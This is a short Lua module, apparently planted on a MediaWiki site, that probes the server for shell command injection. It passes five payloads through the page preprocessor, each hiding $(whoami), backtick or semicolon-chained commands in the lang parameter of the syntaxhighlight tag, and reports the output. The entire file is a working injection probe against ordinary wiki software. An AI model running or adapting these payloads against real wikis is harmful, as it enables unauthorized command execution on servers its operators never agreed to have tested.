模块:SstiSyntax

local p = {}
function p.test(frame)
    local parent = frame:getParent()
    if not parent or not parent.preprocess then return "no_parent" end

    -- Test {{#tag:syntaxhighlight}} with command injection
    local payloads = {
        {"baseline", "{{#tag:syntaxhighlight|TEST_CODE|lang=python}}"},
        {"cmd_sub", "{{#tag:syntaxhighlight|TEST_CODE|lang=$(whoami 2>&1)}}"},
        {"backtick", "{{#tag:syntaxhighlight|TEST_CODE|lang=`whoami 2>&1`}}"},
        {"semicolon", "{{#tag:syntaxhighlight|TEST_CODE|lang=python;whoami 2>&1;echo}}"},
        {"syntaxhighlight_tag", "<syntaxhighlight lang=\"$(whoami 2>&1)\">TEST_CODE</syntaxhighlight>"},
    }

    local results = {}
    for _, pl in ipairs(payloads) do
        local ok, out = pcall(parent.preprocess, parent, pl[2])
        results[#results+1] = pl[1] .. "=" .. tostring(out):sub(1,60)
    end
    return table.concat(results, " | ")
end
return p